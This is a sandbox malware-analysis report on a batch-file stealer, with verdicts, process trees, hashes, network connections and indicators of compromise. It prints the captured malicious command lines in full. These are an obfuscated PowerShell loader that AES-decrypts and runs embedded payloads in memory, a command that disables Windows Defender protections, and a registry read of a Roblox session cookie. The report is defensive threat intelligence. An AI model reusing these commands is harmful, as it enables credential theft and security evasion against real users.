File name:

ez.bat

Full analysis: https://app.any.run/tasks/1714abd8-8fe0-4f4d-b407-a6754b6765df
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Analysis date: May 17, 2025, 02:06:00
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto
heodo
botnet
stealer
evasion
discord
exfiltration
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with very long lines (47892), with CRLF line terminators
MD5:

EF76A4810C2D60537EC4445F016BE9F7

SHA1:

94DC9F665FD4253317C3C25D6C0367E0A2BAD7B8

SHA256:

EAD3E4E40F66DDD6F8B0A0A80FC566D8EA47CEBE6EAC4436156883DD9B228D77

SSDEEP:

6144:n42d4uimRJhpTwp28u7udi0706wIiQfls9z7nK5pWRsjstDozmzJ7:n444u/fhpI1gudT701UW/KIsSWOF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6264)
      • powershell.exe (PID: 7456)
      • powershell.exe (PID: 7972)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6264)
      • powershell.exe (PID: 7972)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 5936)
      • cmd.exe (PID: 7812)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 6264)
      • powershell.exe (PID: 7972)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 6264)
      • powershell.exe (PID: 7972)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 6264)
      • powershell.exe (PID: 7972)
    • BOTNET has been found (auto)

      • powershell.exe (PID: 6264)
    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 6768)
    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 6768)
    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 6768)
    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 6768)
    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 6768)
    • Changes settings for real-time protection

      • powershell.exe (PID: 6768)
    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 6768)
    • Steals credentials from Web Browsers

      • powershell.exe (PID: 7972)
    • Changes Windows Defender settings

      • powershell.exe (PID: 7972)
    • Adds path to the Windows Defender exclusion list

      • powershell.exe (PID: 7972)
    • Actions looks like stealing of personal data

      • powershell.exe (PID: 7972)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 7972)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5936)
      • wusa.exe (PID: 7424)
      • cmd.exe (PID: 7812)
      • powershell.exe (PID: 7972)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 5936)
      • cmd.exe (PID: 7812)
    • Cryptography encrypted command line is found

      • powershell.exe (PID: 6264)
      • powershell.exe (PID: 7972)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 5936)
      • cmd.exe (PID: 7812)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 6264)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 6264)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 7456)
    • Executing commands from a ".bat" file

      • powershell.exe (PID: 7456)
    • Script disables Windows Defender's IPS

      • powershell.exe (PID: 7972)
    • Script disables Windows Defender's real-time protection

      • powershell.exe (PID: 7972)
    • Script adds exclusion path to Windows Defender

      • powershell.exe (PID: 7972)
    • Application launched itself

      • powershell.exe (PID: 7972)
    • Uses WMIC.EXE to obtain operating system information

      • powershell.exe (PID: 7972)
    • Checks for external IP

      • svchost.exe (PID: 2196)
      • powershell.exe (PID: 7972)
    • Accesses operating system name via WMI (SCRIPT)

      • WMIC.exe (PID: 7432)
    • Uses WMIC.EXE to obtain computer system information

      • powershell.exe (PID: 7972)
    • Uses WMIC.EXE to obtain Windows Installer data

      • powershell.exe (PID: 7972)
    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 7516)
    • Uses WMIC.EXE to obtain a list of video controllers

      • powershell.exe (PID: 7972)
    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 7628)
    • The process connected to a server suspected of theft

      • powershell.exe (PID: 7972)
  • INFO

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 6264)
      • powershell.exe (PID: 7972)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6264)
      • powershell.exe (PID: 7972)
    • The sample compiled with english language support

      • powershell.exe (PID: 6264)
    • Checks supported languages

      • wusa.exe (PID: 7424)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 8120)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8120)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 7368)
      • powershell.exe (PID: 960)
    • Disables trace logs

      • powershell.exe (PID: 7972)
    • Checks proxy server information

      • powershell.exe (PID: 7972)
    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 7432)
      • WMIC.exe (PID: 7780)
      • WMIC.exe (PID: 7516)
      • WMIC.exe (PID: 7628)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
160
Monitored processes
31
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs #BOTNET powershell.exe sppextcomobj.exe no specs slui.exe no specs wusa.exe no specs wusa.exe powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs wmic.exe no specs conhost.exe no specs svchost.exe wmic.exe no specs conhost.exe no specs wmic.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs wmic.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
960"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
5800\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5936C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\ez.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
6264"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dDnblxnP19FX0h4Dxm2rUDsDvJ2tj1iN+ZHxAnvQArY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Eco91rv95nSJUb6iq4CADw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cjvwT=New-Object System.IO.MemoryStream(,$param_var); $FxZDp=New-Object System.IO.MemoryStream; $fSetE=New-Object System.IO.Compression.GZipStream($cjvwT, [IO.Compression.CompressionMode]::Decompress); $fSetE.CopyTo($FxZDp); $fSetE.Dispose(); $cjvwT.Dispose(); $FxZDp.Dispose(); $FxZDp.ToArray();}function execute_function($param_var,$param2_var){ $AJKQl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LirTF=$AJKQl.EntryPoint; $LirTF.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\admin\AppData\Local\Temp\ez.bat';$xlXgY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\admin\AppData\Local\Temp\ez.bat').Split([Environment]::NewLine);foreach ($TrXzw in $xlXgY) { if ($TrXzw.StartsWith(':: ')) { $EjGLy=$TrXzw.Substring(3); break; }}$payloads_var=[string[]]$EjGLy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6768"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
6872\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6972\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7228C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7264"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
35 916
Read events
35 916
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
6
Text files
17
Unknown types
1

Dropped files

PID
Process
Filename
Type
6264powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uhhwz5th.4bc.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6264powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_exn0bcmq.hap.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7972powershell.exeC:\Users\admin\AppData\Local\Temp\z9hTOft12a7F2gsbinary
MD5:06AD9E737639FDC745B3B65312857109
SHA256:C8925892CA8E213746633033AE95ACFB8DD9531BC376B82066E686AC6F40A404
7972powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_iksntwja.ywe.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6264powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:8290ACBFA0FA8314571CD9E008CA4975
SHA256:8230A51E22D840B0D0616A53A6C138977A9A92C752266AA4AD4F76DED7DB29DF
6768powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bwnmu0pz.e4i.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6264powershell.exeC:\Windows \System32\wusa.exeexecutable
MD5:801B460F20F2978F29616947C8571925
SHA256:40DC0E7A94D204F263A48EBF316AB144A584D9EDA0CDD05D11114CFCC5397894
8120powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vaimeqkk.stv.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7972powershell.exeC:\Users\admin\AppData\Local\Temp\dSV3Agiz3gKl2Mfbinary
MD5:A45465CDCDC6CB30C8906F3DA4EC114C
SHA256:4412319EF944EBCCA9581CBACB1D4E1DC614C348D1DFC5D2FAAAAD863D300209
7972powershell.exeC:\Users\admin\AppData\Local\Temp\BFM5OlmZr0xSLoZbinary
MD5:29A644B1F0D96166A05602FE27B3F4AD
SHA256:BF96902FEB97E990A471492F78EE8386BCF430D66BDAEFDEAFBF912C8CF7CE46
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
16
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7972
powershell.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/?fields=225545
unknown
whitelisted
7872
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7872
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
23.216.77.6:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.159.64:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
7972
powershell.exe
172.217.23.99:443
gstatic.com
GOOGLE
US
whitelisted
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
whitelisted
google.com
  • 142.250.185.174
whitelisted
crl.microsoft.com
  • 23.216.77.6
  • 23.216.77.28
whitelisted
www.microsoft.com
  • 23.35.229.160
  • 2.23.246.101
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
login.live.com
  • 20.190.159.64
  • 20.190.159.128
  • 40.126.31.131
  • 40.126.31.129
  • 20.190.159.73
  • 20.190.159.71
  • 20.190.159.68
  • 20.190.159.131
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
gstatic.com
  • 172.217.23.99
whitelisted
ip-api.com
  • 208.95.112.1
whitelisted
discordstealervortex.vercel.app
  • 64.29.17.193
  • 216.198.79.193
unknown

Threats

PID
Process
Class
Message
2196
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
7972
powershell.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
2196
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloud infrastructure to build app (vercel .app)
7972
powershell.exe
Successful Credential Theft Detected
STEALER [ANY.RUN] Attempt to exfiltrate via Discord
No debug info